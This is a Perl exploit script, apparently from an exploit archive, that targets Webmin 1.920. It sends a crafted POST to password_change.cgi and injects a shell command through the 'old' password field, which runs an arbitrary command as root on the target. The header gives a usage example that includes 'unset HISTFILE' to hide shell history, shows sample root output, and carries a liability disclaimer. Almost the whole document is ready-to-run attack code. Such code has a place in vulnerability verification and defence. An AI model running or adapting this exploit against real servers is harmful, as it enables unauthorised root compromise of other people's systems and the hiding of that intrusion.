Share
#!/usr/bin/perl -w  
#  
# Webmin 1.920 Remote Root Exploit  
#  
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>  
#  
# Disclaimer:  
# This or previous programs are for Educational   
# purpose ONLY. Do not use it without permission.   
# The usual disclaimer applies, especially the   
# fact that Todor Donev is not liable for any   
# damages caused by direct or indirect use of the   
# information or functionality provided by these   
# programs. The author or any Internet provider   
# bears NO responsibility for content or misuse   
# of these programs or any derivatives thereof.  
# By using these programs you accept the fact   
# that any damage (dataloss, system crash,   
# system compromise, etc.) caused by the use   
# of these programs are not Todor Donev's   
# responsibility.  
#   
# Use them at your own risk!  
#  
# The other exploits not works for me..  
#  
# Tested on CentOS  
#  
# [test@localhost ~]$ perl webmin.pl  
# [ Webmin 1.920 Remote Root Exploit  
# [ ==========================================================  
# [ First time released at Defcon  
# [ Thank you guys, for all..  
# [ Exploit by: Todor Donev  
# [ <todor.donev@gmail.com>  
# [ ==========================================================  
# [ Usage: webmin.pl <host> <port> <command>  
# [ e.g. webmin.pl localhost 10000 "unset HISTFILE;uname -a;id;uptime"  
#  
# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0  
# [test@localhost ~]$   
#  
#  
#  
# ATTENTION !! ATTENTION !! ATTENTION !! ATTENTION !! ATTENTION !!   
#  
# Guys, please give a star to https://github.com/otvorete/petition  
# to support the cause of the Bulgarian Hackers (Developers) Community.  
# We want to makes our Electronic Government more securе, transparent   
# and reliable. For this reason we want from our government to open   
# the source codes of the applications. So support us with a star,   
# please..  
#  
# Special thanks to Konstantin Spirov that starting the cause!!  
#  
#  
  
use strict;  
use HTTP::Request;  
use LWP::UserAgent;  
  
my $host = shift || 'localhost';  
my $port = shift || '10000';  
my $cmd = shift || 'uname -a;id;uptime';  
$cmd =~ s/\|/\;/g;  
  
print "[ Webmin 1.920 Remote Root Exploit\n";  
print "[ ==========================================================\n";  
print "[ First time released at Defcon\n";  
print "[ Thank you guys, for all..\n";  
print "[ Exploit by: Todor Donev\n";  
print "[ <todor.donev\@gmail.com>\n";  
print "[ ==========================================================\n";  
print "[ Usage: $0 <host> <port> <command>\n";  
print "[ e.g. $0 localhost 10000 \"unset HISTFILE;uname -a;id;uptime\"\n";  
my $browser = LWP::UserAgent ->new(ssl_opts => { verify_hostname => 0 });  
$browser->timeout(5);  
$browser->agent('Mozilla/5.0');  
my $target = "https://".$host.":".$port."/password_change.cgi";  
my $request = HTTP::Request->new (  
POST => $target,  
[ Content_Type => "application/x-www-form-urlencoded" ,  
Referer => "https://".$host.":".$port."/session_login.cgi" ],  
"user=wheel&pam=&expired=2&old=id|echo OWNED;$cmd;echo OWNED&new1=wheel&new2=wheel");  
$request->header("Cookie" => "redirect=1; testing=1; sid=x; sessiontest=1;");  
my $content = $browser->request($request)->as_string();  
print $1 and exit if ($content =~ m/OWNED(.*?)OWNED/ms);  
print "[ Exploit Failed!\n" and exit if (not $content =~ m/OWNED(.*?)OWNED/ms);